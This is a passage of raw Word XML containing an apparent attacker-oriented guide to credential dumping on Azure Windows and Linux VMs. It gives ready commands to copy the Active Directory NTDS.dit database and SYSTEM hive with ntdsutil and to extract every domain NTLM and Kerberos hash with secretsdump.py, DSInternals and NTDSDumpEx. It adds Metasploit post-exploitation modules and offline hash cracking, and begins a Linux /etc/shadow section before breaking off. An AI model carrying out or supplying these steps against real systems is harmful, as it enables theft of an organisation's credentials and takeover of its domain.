    <w:p w14:paraId="77E980C0" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Extract </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and SYSTEM Hive Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FD48E0" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Method A: Using PowerShell &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTDSUtil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36E18E6B" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>NTDSUtil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> to create a copy of the AD database snapshot including necessary hive files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06217EEF" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> "ntdsutil.exe 'ac </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>ntds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>' '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>ifm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">' 'create full c:\temp' q </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0F450E" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">This will create files including </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> and SYSTEM in C:\temp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD906B3" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>Copy these files securely (e.g., SMB, RDP clipboard, Azure File Share) to your attacker machine for offline analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E2C7FC" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="46EE0413">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="411EE8E9" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Dump Hashes Offline Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impacket’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> secretsdump.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DA0EBB" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>On your Kali or Linux attacker machine, run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D73FED7" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>./secretsdump.py -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>ntds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> /root/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>ntds.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> -system /root/SYSTEM LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06044EF5" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>This extracts all domain hashes (NTLM) quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E55C01A" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="341F259E">
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB7A100" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DSInternals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> PowerShell Module (Native Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A86B12" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">Download and install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>DSInternals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> for advanced AD auditing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552064DC" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">Save-Module </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>DSInternals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> -Path C:\Windows\System32\WindowsPowerShell\v1.0\Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CA2529" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> Unrestricted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24007C8C" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">Import-Module </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>DSInternals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41B6DADB" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">Extract the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>BootKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> from SYSTEM hive:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF6CECA" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>BootKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>SystemHivePath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> 'C:\temp\SYSTEM'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D67DCF1" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">Dump AD account hashes from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>BootKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14940749" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>ADDBAccount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> -All -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>DBPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> 'C:\temp\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>ntds.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>' -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>Bootkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>bootkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE82735" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:lastRenderedPageBreak/>
        <w:t>This outputs user hashes, including NTLM and Kerberos keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E34CBC3" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="29F2FAA3">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A79B175" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5: Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTDSDumpEx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (External Tool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5999C97E" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">Download and unzip </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>NTDSDumpEx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> tool on Windows or your analysis machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD3C781" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">Run against extracted </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> and SYSTEM hive files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06998CD0" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>NTDSDumpEx.exe -d C:\temp\ntds.dit -s C:\temp\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBBBF3C" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>Outputs all users and their hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA4390F" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="698609B1">
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="432DF39A" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 6: Remote Dumping with Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E73E39" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>After obtaining a Meterpreter session on the target Windows VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464B0465" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>use post/windows/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>ntds_location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46F481EA" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>set session &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>session_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D28C513" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101D464B" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">This module locates the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> file path remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1E5D4C" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">Next, use related Metasploit post modules like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> or kiwi to dump credentials if SYSTEM privileges are available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEE1355" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="562EBA45">
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3168A535" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 7: Crack Password Hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1696A983" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">Use tools such as John the Ripper or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> to crack dumped NTLM hashes offline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF1D677" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="59ACC347">
          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BD5ED5" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Part 2: Credential Dumping on Linux Azure VMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEBF5C7" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>Linux local accounts store hashes in /etc/shadow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A40E2C9" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>Commands to dump:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4648E680" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
